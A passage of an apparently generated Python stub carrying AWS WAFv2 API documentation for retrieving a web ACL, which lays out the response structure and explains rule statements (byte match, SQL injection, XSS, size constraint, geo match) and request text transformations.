'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
'Capacity': 123,
'PreProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'PostProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'ManagedByFirewallManager': True|False
},
'LockToken': 'string'
}
:returns:
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
"""
pass
def get_web_acl_for_resource(ResourceArn=None):
"""
Retrieves the WebACL for the specified resource.
See also: AWS API Documentation
Exceptions
:example: response = client.get_web_acl_for_resource(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe ARN (Amazon Resource Name) of the resource.\n
:rtype: dict
Returns
Response Syntax
{
'WebACL': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'DefaultAction': {
'Block': {},
'Allow': {}
},
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
'Capacity': 123,
'PreProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'PostProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'ManagedByFirewallManager': True|False
}
}
Response Structure
(dict) --
WebACL (dict) --The Web ACL that is associated with the resource. If there is no associated resource, AWS WAF returns a null Web ACL.
Name (string) --The name of the Web ACL. You cannot change the name of a Web ACL after you create it.
Id (string) --A unique identifier for the WebACL . This ID is returned in the responses to create and list commands. You use this ID to do things like get, update, and delete a WebACL .
ARN (string) --The Amazon Resource Name (ARN) of the Web ACL that you want to associate with the resource.
DefaultAction (dict) --The action to perform if none of the Rules contained in the WebACL match.
Block (dict) --Specifies that AWS WAF should block requests by default.
Allow (dict) --Specifies that AWS WAF should allow requests by default.
Description (string) --A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
Rules (list) --The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
Name (string) --The name of the rule. You can't change the name of a Rule after you create it.
Priority (integer) --If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don't need to be consecutive, but they must all be different.
Statement (dict) --The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .
ByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is referred to as a string match statement.
SearchString (bytes) --A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.
Valid values depend on the component that you specify for inspection in FieldToMatch :
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
If SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.
If you're using the AWS WAF API
Specify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.
For example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .
If you're using the AWS CLI or one of the AWS SDKs
The value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.
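For instance, a minimal sketch of the encoding step required for direct API calls, using the BadBot example above (the CLI and SDKs do this for you):
import base64
# Direct AWS WAF API calls expect the base64-encoded search value.
encoded = base64.b64encode(b'BadBot').decode('ascii')
print(encoded)  # QmFkQm90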
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: \ " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol (<)
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh;, with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn;, with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
PositionalConstraint (string) --The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:
CONTAINS
The specified part of the web request must include the value of SearchString , but the location doesn't matter.
CONTAINS_WORD
The specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:
SearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .
SearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .
EXACTLY
The value of the specified part of the web request must exactly match the value of SearchString .
STARTS_WITH
The value of SearchString must appear at the beginning of the specified part of the web request.
ENDS_WITH
The value of SearchString must appear at the end of the specified part of the web request.
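Putting these fields together, an illustrative (not authoritative) ByteMatchStatement might look like the following sketch:
byte_match_statement = {
    'SearchString': b'BadBot',  # the SDK base64-encodes this for you
    'FieldToMatch': {'SingleHeader': {'Name': 'User-Agent'}},
    'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}],
    'PositionalConstraint': 'CONTAINS'
}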
SqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: \ " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol (<)
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh;, with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn;, with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
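For instance, a minimal SqliMatchStatement sketch that URL-decodes the query string before inspection might be:
sqli_match_statement = {
    'FieldToMatch': {'QueryString': {}},
    'TextTransformations': [{'Priority': 0, 'Type': 'URL_DECODE'}]
}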
XssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-side scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: \ " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol (<)
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh;, with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn;, with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
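As a rough illustration, an XssMatchStatement that decodes the request body before inspection could look like:
xss_match_statement = {
    'FieldToMatch': {'Body': {}},
    'TextTransformations': [
        {'Priority': 0, 'Type': 'URL_DECODE'},
        {'Priority': 1, 'Type': 'HTML_ENTITY_DECODE'}
    ]
}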
SizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.
If you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.
If you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
